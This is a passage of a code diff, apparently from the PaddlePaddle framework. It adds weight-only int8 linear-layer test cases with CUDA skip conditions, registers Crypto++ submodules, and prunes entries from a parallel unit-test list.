test_weightonly_linear_backward(self): np.testing.assert_allclose(quant_x.grad, x.grad, rtol=1e-3, atol=1e-3) +@unittest.skipIf( + not core.is_compiled_with_cuda() or get_cuda_version() < 11020, + 
"quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", +) +class WeightOnlyLinearTestCase11(WeightOnlyLinearTestCase): + def config(self): + super().config() + self.dtype = 'float16' + self.weight_dtype = "int8" + self.in_features = 128 + self.out_features = 288 + + +@unittest.skipIf( + not core.is_compiled_with_cuda() or get_cuda_version() < 11020, + "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", +) +class WeightOnlyLinearTestCase12(WeightOnlyLinearTestCase): + def config(self): + super().config() + self.dtype = 'float16' + self.bias = False + self.weight_dtype = "int8" + self.in_features = 128 + self.out_features = 288 + + +@unittest.skipIf( + not core.is_compiled_with_cuda() + or get_cuda_version() < 11020 + or paddle.device.cuda.get_device_capability()[0] < 8, + "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", +) +class WeightOnlyLinearTestCase13(WeightOnlyLinearTestCase): + def config(self): + super().config() + self.dtype = 'bfloat16' + self.weight_dtype = "int8" + self.in_features = 128 + self.out_features = 288 + + if __name__ == '__main__': unittest.main() diff --git a/third_party/cryptopp b/third_party/cryptopp new file mode 160000 index 00000000000000..9dcc26c58213ab --- /dev/null +++ b/third_party/cryptopp @@ -0,0 +1 @@ +Subproject commit 9dcc26c58213abb8351fbb1b2a7a1d2c667366e4 diff --git a/third_party/cryptopp-cmake b/third_party/cryptopp-cmake new file mode 160000 index 00000000000000..6d0666c457fbbf --- /dev/null +++ b/third_party/cryptopp-cmake @@ -0,0 +1 @@ +Subproject commit 6d0666c457fbbf6f81819fd2b80f0cb5b6646593 diff --git a/tools/parallel_UT_rule.py b/tools/parallel_UT_rule.py index 464fb9cc1cfe46..cbc97375fd869d 100755 --- a/tools/parallel_UT_rule.py +++ b/tools/parallel_UT_rule.py @@ -28,7 +28,6 @@ 'test_fc_gru_fuse_pass_cc', 'device_worker_test', 'test_custom_conj', - 'infer_io_utils_tester', 'test_transpose_bf16_mkldnn_op', 'test_container', 'cpu_helper_test', @@ -73,7 +72,6 @@ 'test_pybind_interface', 'test_io_save_load', 'test_fusion_lstm_int8_mkldnn_op', - 'test_benchmark', 'test_protobuf', 'test_tdm_sampler_op', 'test_teacher_student_sigmoid_loss_op', @@ -482,7 +480,6 @@ 'test_communicator_half_async', 'test_dynrnn_gradient_check', 'test_pool2d_bf16_mkldnn_op', - 'test_table_printer', 'test_framework_debug_str', 'test_dist_fleet_ps2', 'test_collective_scatter_api', @@ -1926,7 +1923,6 @@ 'test_bpr_loss_op', 'test_boxps', 'test_bipartite_match_op', - 'test_benchmark', 'test_beam_search_op', 'test_batch_sampler', 'test_batch_norm_act_fuse_pass', @@ -1970,7 +1966,6 @@ 'lodtensor_printer_test', 'test_dispatch_jit', 'inlined_vector_test', - 'infer_io_utils_tester', 'graph_to_program_pass_test', 'graph_test', 'graph_helper_test', @@ -2176,7 +2171,6 @@ 'test_auto_parallel_api', 'test_tensor_copy_from', 'test_analyzer_capi_exp_xpu', - 'test_table_printer', 'test_egr_task_autocodegen', 'test_static_save_load_bf16', 'test_parallel_executor_run_cinn',